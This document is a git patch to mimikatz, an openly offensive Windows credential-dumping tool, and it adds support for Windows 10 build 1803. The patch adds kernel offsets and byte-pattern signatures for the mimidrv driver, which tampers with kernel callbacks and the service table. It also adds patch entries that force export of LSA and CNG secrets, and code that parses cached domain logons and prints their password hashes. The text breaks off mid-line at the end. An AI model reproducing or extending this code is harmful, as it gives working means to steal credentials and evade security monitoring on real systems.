From 9cd7e2dba758556d971a6e80c840084d82a69bf4 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Thu, 22 Mar 2018 03:56:19 +0100 Subject: [PATCH] [new] mimikatz & mimidrv support for Windows 10 build 1803 (17623) x64 [internal] structures for SAM cache --- inc/globals.h | 2 + mimidrv/globals.h | 3 +- mimidrv/kkll_m_filters.c | 2 + mimidrv/kkll_m_notify.c | 9 +++- mimidrv/kkll_m_process.c | 4 +- mimidrv/kkll_m_ssdt.c | 11 +++- mimidrv/mimidrv.c | 7 ++- mimikatz/modules/crypto/kuhl_m_crypto_patch.c | 1 + mimikatz/modules/kuhl_m_lsadump.c | 53 +++++++++++++++--- mimikatz/modules/kuhl_m_lsadump.h | 23 +++++++- mimikatz/modules/kuhl_m_standard.c | 54 ++++++++++++++++++- mimikatz/modules/kuhl_m_standard.h | 9 ++-- mimikatz/modules/kuhl_m_vault.c | 2 + .../modules/sekurlsa/kuhl_m_sekurlsa_utils.c | 2 + 14 files changed, 161 insertions(+), 21 deletions(-) diff --git a/inc/globals.h b/inc/globals.h index e87b5d5..d6f968c 100644 --- a/inc/globals.h +++ b/inc/globals.h @@ -95,6 +95,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU #define KULL_M_WIN_BUILD_10_1607 14393 #define KULL_M_WIN_BUILD_10_1703 15063 #define KULL_M_WIN_BUILD_10_1709 16299 +#define KULL_M_WIN_BUILD_10_1803 17623 + #define KULL_M_WIN_MIN_BUILD_XP 2500 #define KULL_M_WIN_MIN_BUILD_2K3 3000 diff --git a/mimidrv/globals.h b/mimidrv/globals.h index 7d34797..4bfb25f 100644 --- a/mimidrv/globals.h +++ b/mimidrv/globals.h @@ -39,7 +39,8 @@ typedef enum _KIWI_OS_INDEX { KiwiOsIndex_10_1607 = 9, KiwiOsIndex_10_1703 = 10, KiwiOsIndex_10_1709 = 11, - KiwiOsIndex_MAX = 12, + KiwiOsIndex_10_1803 = 12, + KiwiOsIndex_MAX = 13, } KIWI_OS_INDEX, *PKIWI_OS_INDEX; #ifdef _M_IX86 diff --git a/mimidrv/kkll_m_filters.c b/mimidrv/kkll_m_filters.c index efa7dc2..7a66253 100644 --- a/mimidrv/kkll_m_filters.c +++ b/mimidrv/kkll_m_filters.c @@ -21,6 +21,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] = /* 10_1607*/{0x004c, 0x000c, 0x0010, 0x0040}, /* 10_1703*/{0x004c, 0x000c, 0x0010, 0x0040}, /* 10_1709*/{0x004c, 0x000c, 0x0010, 0x0040}, +/* 10_1803*/{0x004c, 0x000c, 0x0010, 0x0040}, #else /* UNK */ {0}, /* XP */ {0}, @@ -34,6 +35,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] = /* 10_1607*/{0x0090, 0x0018, 0x0020, 0x0060}, /* 10_1703*/{0x0090, 0x0018, 0x0020, 0x0060}, /* 10_1709*/{0x0090, 0x0018, 0x0020, 0x0060}, +/* 10_1803*/{0x0090, 0x0018, 0x0020, 0x0060}, #endif }; diff --git a/mimidrv/kkll_m_notify.c b/mimidrv/kkll_m_notify.c index 510a6c5..169e21b 100644 --- a/mimidrv/kkll_m_notify.c +++ b/mimidrv/kkll_m_notify.c @@ -13,7 +13,7 @@ PKKLL_M_MEMORY_OFFSETS pCmpCallBackOffsets = NULL; POBJECT_DIRECTORY *ObpTypeDirectoryObject = NULL; PKKLL_M_MEMORY_OFFSETS pObpTypeDirectoryObjectOffsets = NULL; -PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL; +//PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL; POB_PRE_OPERATION_CALLBACK kkll_m_notify_fakePre = NULL; POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL; @@ -32,6 +32,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = { {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}}, {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}}, {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}}, + {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Thread), PTRN_W10_Thread}, L"PsRemoveCreateThreadNotifyRoutine", L"PsRemoveLoadImageNotifyRoutine", { -8, 64}}, }; UCHAR PTRN_W23_Process[] = {0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8}; UCHAR PTRN_WVI_Process[] = {0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8}; @@ -42,7 +43,7 @@ UCHAR PTRN_W10_1507_Process[] = {0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, UCHAR PTRN_W10_1511_Process[] = {0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8}; UCHAR PTRN_W10_1607_Process[] = {0x49, 0x8d, 0x0c, 0xfc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8}; UCHAR PTRN_W10_1703_Process[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8}; -UCHAR PTRN_W10_1709_Process[] = {0x48, 0x8d, 0x0c, 0xdd, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x49, 0x03, 0xcd, 0x48, 0x8b, 0xd6, 0xe8}; +UCHAR PTRN_W10_1709_Process[] = {0x48, 0x8d, 0x0c, 0xdd, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x49, 0x03, 0xcd, 0x48, 0x8b/*, 0xd6, 0xe8*/}; KKLL_M_MEMORY_GENERIC ProcessReferences[] = { {KiwiOsIndex_2K3, {sizeof(PTRN_W23_Process), PTRN_W23_Process}, L"PsReferencePrimaryToken", L"CcSetBcbOwnerPointer", { -4, 8}}, {KiwiOsIndex_VISTA, {sizeof(PTRN_WVI_Process), PTRN_WVI_Process}, L"SeCreateAccessStateEx", L"PsReferenceImpersonationToken", { -4, 64}}, @@ -54,6 +55,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = { {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_1607_Process), PTRN_W10_1607_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}}, {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process}, L"PsSetCreateProcessNotifyRoutine", L"KeRegisterProcessorChangeCallback", { -4, 64}}, {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process}, L"PsSetCreateProcessNotifyRoutine", L"RtlGetSystemBootStatus", { -4, 64}}, + {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process}, L"PsSetCreateProcessNotifyRoutine", L"EtwEnableTrace", { -4, 64}}, }; UCHAR PTRN_W23_Image[] = {0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00}; UCHAR PTRN_WVI_Image[] = {0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00}; @@ -72,6 +74,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = { {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"SeRegisterLogonSessionTerminatedRoutineEx", { -4, 64}}, {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}}, {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}}, + {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Image), PTRN_W10_Image}, L"PsSetLoadImageNotifyRoutine", L"PsSetCreateProcessNotifyRoutine", { -4, 64}}, }; UCHAR PTRN_W23_Object[] = {0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4}; UCHAR PTRN_WVI_Object[] = {0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68}; @@ -90,6 +93,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = { {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"KseRegisterShim", { 25, 0x010, 0x070, 0x0c8}}, {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"IoCreateDriver", { 25, 0x010, 0x070, 0x0c8}}, {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"IoCreateDriver", { 25, 0x010, 0x070, 0x0c8}}, + {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Object), PTRN_W10_Object}, L"ObCreateObjectType", L"IoCreateDriver", { 25, 0x010, 0x070, 0x0c8}}, }; UCHAR PTRN_W23_Reg[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8}; UCHAR PTRN_WVI_Reg[] = {0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84}; @@ -108,6 +112,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = { {KiwiOsIndex_10_1607, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"FsRtlAllocateResource", { -9, 0x028}}, {KiwiOsIndex_10_1703, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"DbgkLkmdUnregisterCallback", { -9, 0x028}}, {KiwiOsIndex_10_1709, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"DbgkLkmdUnregisterCallback", { -9, 0x028}}, + {KiwiOsIndex_10_1803, {sizeof(PTRN_W10_Reg), PTRN_W10_Reg}, L"CmUnRegisterCallback", L"DbgkLkmdUnregisterCallback", { -9, 0x028}}, }; #elif defined _M_IX86 UCHAR PTRN_WXP_Thread[] = {0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8}; diff --git a/mimidrv/kkll_m_process.c b/mimidrv/kkll_m_process.c index 4160a83..f195638 100644 --- a/mimidrv/kkll_m_process.c +++ b/mimidrv/kkll_m_process.c @@ -19,7 +19,8 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] = /* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc}, /* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02e4}, /* 10_1703*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, -/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, // +/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, +/* 10_1803*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, #else /* UNK */ {0}, /* XP */ {0}, @@ -33,6 +34,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] = /* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c0}, /* 10_1703*/{0x02e8, 0x0300, 0x0040, 0x06c8}, /* 10_1709*/{0x02e8, 0x0300, 0x0040, 0x06c8}, +/* 10_1803*/{0x02e8, 0x0300, 0x0040, 0x06c8}, #endif }; diff --git a/mimidrv/kkll_m_ssdt.c b/mimidrv/kkll_m_ssdt.c index e6b44a3..3ff6d3c 100644 --- a/mimidrv/kkll_m_ssdt.c +++ b/mimidrv/kkll_m_ssdt.c @@ -44,6 +44,7 @@ NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer) #ifdef _M_X64 const UCHAR PTRN_WALL_Ke[] = {/*0x00, 0x00, 0x4d, 0x0f, 0x45,*/ 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83}; +const UCHAR PTRN_W1803_Ke[] = {0xd3, 0x41, 0x3b, 0x44, 0x3a, 0x10, 0x0f, 0x83}; const LONG OFFS_WNO8_Ke = -24;//-19; const LONG OFFS_WIN8_Ke = -21;//-16; const LONG OFFS_WIN10A_Ke = -38;//-16; @@ -53,7 +54,15 @@ NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable() if(KeServiceDescriptorTable) status = STATUS_SUCCESS; else - status = kkll_m_memory_genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), ((PUCHAR) ZwUnloadKey) + (16 * PAGE_SIZE), PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke); + { + status = kkll_m_memory_genericPointerSearch( + (PUCHAR *) &KeServiceDescriptorTable, + ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), + ((PUCHAR) ZwUnloadKey) + (19 * PAGE_SIZE), + (KiwiOsIndex < KiwiOsIndex_10_1803) ? PTRN_WALL_Ke : PTRN_W1803_Ke, + (KiwiOsIndex < KiwiOsIndex_10_1803) ? sizeof(PTRN_WALL_Ke) : sizeof(PTRN_W1803_Ke), + (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke); + } return status; } #endif \ No newline at end of file diff --git a/mimidrv/mimidrv.c b/mimidrv/mimidrv.c index a57473b..c704f4c 100644 --- a/mimidrv/mimidrv.c +++ b/mimidrv/mimidrv.c @@ -167,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR KIWI_OS_INDEX getWindowsIndex() { - if(*NtBuildNumber > 16299) // forever 10 =) - return KiwiOsIndex_10_1709; + if(*NtBuildNumber > 17623) // forever 10 =) + return KiwiOsIndex_10_1803; switch(*NtBuildNumber) { @@ -210,6 +210,9 @@ KIWI_OS_INDEX getWindowsIndex() case 16299: return KiwiOsIndex_10_1709; break; + case 17623: + return KiwiOsIndex_10_1803; + break; default: return KiwiOsIndex_UNK; } diff --git a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c index 794f811..7c8a7ae 100644 --- a/mimikatz/modules/crypto/kuhl_m_crypto_patch.c +++ b/mimikatz/modules/crypto/kuhl_m_crypto_patch.c @@ -92,6 +92,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = { {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI81_SPCryptExportKey), PTRN_WI81_SPCryptExportKey}, {sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}}, {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_W10_1703_SPCryptExportKey),PTRN_W10_1703_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, + {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}}, }; #elif defined _M_IX86 BYTE PTRN_WNO8_SPCryptExportKey[] = {0xf6, 0x41, 0x20, 0x02, 0x75}; diff --git a/mimikatz/modules/kuhl_m_lsadump.c b/mimikatz/modules/kuhl_m_lsadump.c index b3dd0ab..865c9cf 100644 --- a/mimikatz/modules/kuhl_m_lsadump.c +++ b/mimikatz/modules/kuhl_m_lsadump.c @@ -695,6 +695,7 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity, BYTE digest[MD5_DIGEST_LENGTH]; CRYPTO_BUFFER data, key = {MD5_DIGEST_LENGTH, MD5_DIGEST_LENGTH, digest}; LSA_UNICODE_STRING usr; + if(kuhl_m_lsadump_decryptSecret(hSecurity, hPolicyBase, L"Secrets\\NL$KM\\CurrVal", lsaKeysStream, lsaKeyUnique, &pNLKM, &szNLKM)) { @@ -742,8 +743,8 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity, usr.Length = usr.MaximumLength = pMsCacheEntry->szUserName; usr.Buffer = (PWSTR) ((PBYTE) pMsCacheEntry->enc_data + sizeof(MSCACHE_DATA)); - if(pCacheData->hProv && ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1) - kuhl_m_lsadump_decryptSCCache(pMsCacheEntry->enc_data + (s1 - ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1), ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1, pCacheData->hProv, pCacheData->keySpec); + if(pCacheData->hProv && ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC) + kuhl_m_lsadump_decryptSCCache(pMsCacheEntry->enc_data + (s1 - ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC), ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC, pCacheData->hProv, pCacheData->keySpec); if(pCacheData && pCacheData->username && (_wcsnicmp(pCacheData->username, usr.Buffer, usr.Length / sizeof(wchar_t)) == 0)) { @@ -818,10 +819,49 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity, void kuhl_m_lsadump_printMsCache(PMSCACHE_ENTRY entry, CHAR version) { - kprintf(L"User : %.*s\\%.*s\n", - entry->szDomainName / sizeof(wchar_t), (PBYTE) entry->enc_data + sizeof(MSCACHE_DATA) + entry->szUserName + 2 * ((entry->szUserName / sizeof(wchar_t)) % 2), - entry->szUserName / sizeof(wchar_t), (PBYTE) entry->enc_data + sizeof(MSCACHE_DATA) - ); + //DWORD i; + MSCACHE_ENTRY_PTR ptr; + ptr.UserName.Buffer = (PWSTR) ((PBYTE) entry->enc_data + sizeof(MSCACHE_DATA)); + ptr.UserName.Length = ptr.UserName.MaximumLength = entry->szUserName; + ptr.Domain.Buffer = (PWSTR) ((PBYTE) ptr.UserName.Buffer + SIZE_ALIGN(entry->szUserName, 4)); + ptr.Domain.Length = ptr.Domain.MaximumLength = entry->szDomainName; + //ptr.DnsDomainName.Buffer = (PWSTR) ((PBYTE) ptr.Domain.Buffer + SIZE_ALIGN(entry->szDomainName, 4)); + //ptr.DnsDomainName.Length = ptr.DnsDomainName.MaximumLength = entry->szDnsDomainName; + //ptr.Upn.Buffer = (PWSTR) ((PBYTE) ptr.DnsDomainName.Buffer + SIZE_ALIGN(entry->szDnsDomainName, 4)); + //ptr.Upn.Length = ptr.Upn.MaximumLength = entry->szupn; + //ptr.EffectiveName.Buffer = (PWSTR) ((PBYTE) ptr.Upn.Buffer + SIZE_ALIGN(entry->szupn, 4)); + //ptr.EffectiveName.Length = ptr.EffectiveName.MaximumLength = entry->szEffectiveName; + //ptr.FullName.Buffer = (PWSTR) ((PBYTE) ptr.EffectiveName.Buffer + SIZE_ALIGN(entry->szEffectiveName, 4)); + //ptr.FullName.Length = ptr.FullName.MaximumLength = entry->szFullName; + //ptr.LogonScript.Buffer = (PWSTR) ((PBYTE) ptr.FullName.Buffer + SIZE_ALIGN(entry->szFullName, 4)); + //ptr.LogonScript.Length = ptr.LogonScript.MaximumLength = entry->szlogonScript; + //ptr.ProfilePath.Buffer = (PWSTR) ((PBYTE) ptr.LogonScript.Buffer + SIZE_ALIGN(entry->szlogonScript, 4)); + //ptr.ProfilePath.Length = ptr.ProfilePath.MaximumLength = entry->szprofilePath; + //ptr.HomeDirectory.Buffer = (PWSTR) ((PBYTE) ptr.ProfilePath.Buffer + SIZE_ALIGN(entry->szprofilePath, 4)); + //ptr.HomeDirectory.Length = ptr.HomeDirectory.MaximumLength = entry->szhomeDirectory; + //ptr.HomeDirectoryDrive.Buffer = (PWSTR) ((PBYTE) ptr.HomeDirectory.Buffer + SIZE_ALIGN(entry->szhomeDirectory, 4)); + //ptr.HomeDirectoryDrive.Length = ptr.HomeDirectoryDrive.MaximumLength = entry->szhomeDirectoryDrive; + //ptr.Groups = (PGROUP_MEMBERSHIP) ((PBYTE) ptr.HomeDirectoryDrive.Buffer + SIZE_ALIGN(entry->szhomeDirectoryDrive, 4)); + //ptr.LogonDomainName.Buffer = (PWSTR) ((PBYTE) ptr.Groups + SIZE_ALIGN(entry->groupCount * sizeof(GROUP_MEMBERSHIP), 4)); + //ptr.LogonDomainName.Length = ptr.LogonDomainName.MaximumLength = entry->szlogonDomainName; + + //kprintf(L"UserName : %wZ\n", &ptr.UserName); + //kprintf(L"Domain : %wZ\n", &ptr.Domain); + //kprintf(L"DnsDomainName: %wZ\n", &ptr.DnsDomainName); + //kprintf(L"Upn : %wZ\n", &ptr.Upn); + //kprintf(L"EffectiveName: %wZ\n", &ptr.EffectiveName); + //kprintf(L"FullName : %wZ\n", &ptr.FullName); + //kprintf(L"LogonScript : %wZ\n", &ptr.LogonScript); + //kprintf(L"ProfilePath : %wZ\n", &ptr.ProfilePath); + //kprintf(L"HomeDirectory: %wZ\n", &ptr.HomeDirectory); + //kprintf(L"HomeDirectoryDrive: %wZ\n", &ptr.HomeDirectoryDrive); + //kprintf(L"Groups :"); + //for(i = 0; i < entry->groupCount; i++) + // kprintf(L" %u", ptr.Groups[i].RelativeId); + //kprintf(L"\n"); + //kprintf(L"LogonDomainName: %wZ\n", &ptr.LogonDomainName); + //kprintf(L"sidCount: %u\n", entry->sidCount); + kprintf(L"User : %wZ\\%wZ\n", &ptr.Domain, &ptr.UserName); kprintf(L"MsCacheV%c : ", version); kull_m_string_wprintf_hex(((PMSCACHE_DATA) entry->enc_data)->mshashdata, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n"); } @@ -1124,6 +1164,7 @@ KULL_M_PATCH_GENERIC SamSrvReferences[] = { {KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-24}}, {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-21}}, {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-19}}, + {KULL_M_WIN_BUILD_10_1709, {sizeof(PTRN_WALL_SampQueryInformationUserInternal), PTRN_WALL_SampQueryInformationUserInternal}, {sizeof(PATC_WALL_JmpShort), PATC_WALL_JmpShort}, {-21}}, }; #elif defined _M_IX86 BYTE PTRN_WALL_SampQueryInformationUserInternal[] = {0xc6, 0x40, 0x22, 0x00, 0x8b}; diff --git a/mimikatz/modules/kuhl_m_lsadump.h b/mimikatz/modules/kuhl_m_lsadump.h index c1620bb..a751158 100644 --- a/mimikatz/modules/kuhl_m_lsadump.h +++ b/mimikatz/modules/kuhl_m_lsadump.h @@ -266,7 +266,7 @@ typedef struct _MSCACHE_ENTRY { WORD szUserName; WORD szDomainName; WORD szEffectiveName; - WORD szfullName; + WORD szFullName; WORD szlogonScript; WORD szprofilePath; WORD szhomeDirectory; @@ -289,11 +289,30 @@ typedef struct _MSCACHE_ENTRY { BYTE enc_data[ANYSIZE_ARRAY]; } MSCACHE_ENTRY, *PMSCACHE_ENTRY; +typedef struct _MSCACHE_ENTRY_PTR { + UNICODE_STRING UserName; + UNICODE_STRING Domain; + UNICODE_STRING DnsDomainName; + UNICODE_STRING Upn; + UNICODE_STRING EffectiveName; + UNICODE_STRING FullName; + + UNICODE_STRING LogonScript; + UNICODE_STRING ProfilePath; + UNICODE_STRING HomeDirectory; + UNICODE_STRING HomeDirectoryDrive; + + PGROUP_MEMBERSHIP Groups; + + UNICODE_STRING LogonDomainName; + +} MSCACHE_ENTRY_PTR, *PMSCACHE_ENTRY_PTR; + typedef struct _MSCACHE_DATA { BYTE mshashdata[LM_NTLM_HASH_LENGTH]; BYTE unkhash[LM_NTLM_HASH_LENGTH]; DWORD unk0; - DWORD unk1; + DWORD szSC; DWORD unkLength; DWORD unk2; DWORD unk3; diff --git a/mimikatz/modules/kuhl_m_standard.c b/mimikatz/modules/kuhl_m_standard.c index 54a83f7..5910c25 100644 --- a/mimikatz/modules/kuhl_m_standard.c +++ b/mimikatz/modules/kuhl_m_standard.c @@ -90,7 +90,7 @@ NTSTATUS kuhl_m_standard_base64(int argc, wchar_t * argv[]) const wchar_t *version_libs[] = { L"lsasrv.dll", L"msv1_0.dll", L"tspkg.dll", L"wdigest.dll", L"kerberos.dll", L"livessp.dll", L"dpapisrv.dll", - L"kdcsvd.dll", L"cryptdll.dll", L"lsadb.dll", L"samsrv.dll", L"rsaenh.dll", L"ncrypt.dll", L"ncryptprov.dll", + L"kdcsvc.dll", L"cryptdll.dll", L"lsadb.dll", L"samsrv.dll", L"rsaenh.dll", L"ncrypt.dll", L"ncryptprov.dll", L"eventlog.dll", L"wevtsvc.dll", L"termsrv.dll", }; NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) @@ -99,6 +99,10 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) PVOID buffer; UINT lenVer; VS_FIXEDFILEINFO *verInfo; + PKIWI_CABINET pCab; + wchar_t *system, *cabname, pathc[MAX_PATH]; + DWORD dwSystem; + char *pFile, *acabname; BOOL isWow64 #ifdef _M_X64 = TRUE; @@ -135,7 +139,7 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) } } #endif - if(argc) + if(kull_m_string_args_byName(argc, argv, L"full", NULL, NULL)) { kprintf(L"\n"); for(i = 0; i < ARRAYSIZE(version_libs); i++) @@ -157,6 +161,52 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[]) } } } + + if(kull_m_string_args_byName(argc, argv, L"cab", NULL, NULL)) + { + kprintf(L"\n"); + if(dwSystem = GetSystemDirectory(NULL, 0)) + { + if(system = (wchar_t *) LocalAlloc(LPTR, dwSystem * sizeof(wchar_t))) + { + if(GetSystemDirectory(system, dwSystem) == (dwSystem - 1)) + { + if(kull_m_string_sprintf(&cabname, MIMIKATZ L"_" MIMIKATZ_ARCH L"_sysfiles_%u", MIMIKATZ_NT_BUILD_NUMBER)) + { + if(acabname = kull_m_string_unicode_to_ansi(cabname)) + { + kprintf(L"CAB: %S\n", acabname); + if(pCab = kull_m_cabinet_create(acabname)) + { + for(i = 0; i < ARRAYSIZE(version_libs); i++) + { + if(PathCombine(pathc, system, version_libs[i])) + { + if(kull_m_file_isFileExist(pathc)) + { + if(pFile = kull_m_string_unicode_to_ansi(pathc)) + { + kprintf(L" -> %s\n", version_libs[i]); + kull_m_cabinet_add(pCab, pFile, NULL); + LocalFree(pFile); + } + } + } + else PRINT_ERROR_AUTO(L"PathCombine"); + } + kull_m_cabinet_close(pCab); + } + LocalFree(acabname); + } + LocalFree(cabname); + } + } + else PRINT_ERROR_AUTO(L"GetSystemDirectory(data)"); + LocalFree(system); + } + } + else PRINT_ERROR_AUTO(L"GetSystemDirectory(init)"); + } return STATUS_SUCCESS; } diff --git a/mimikatz/modules/kuhl_m_standard.h b/mimikatz/modules/kuhl_m_standard.h index a44507d..f9c2094 100644 --- a/mimikatz/modules/kuhl_m_standard.h +++ b/mimikatz/modules/kuhl_m_standard.h @@ -5,10 +5,11 @@ */ #pragma once #include "kuhl_m.h" -#include "../modules/kull_m_string.h" -#include "../modules/kull_m_file.h" -#include "../modules/kull_m_process.h" -#include "../modules/kull_m_net.h" +#include 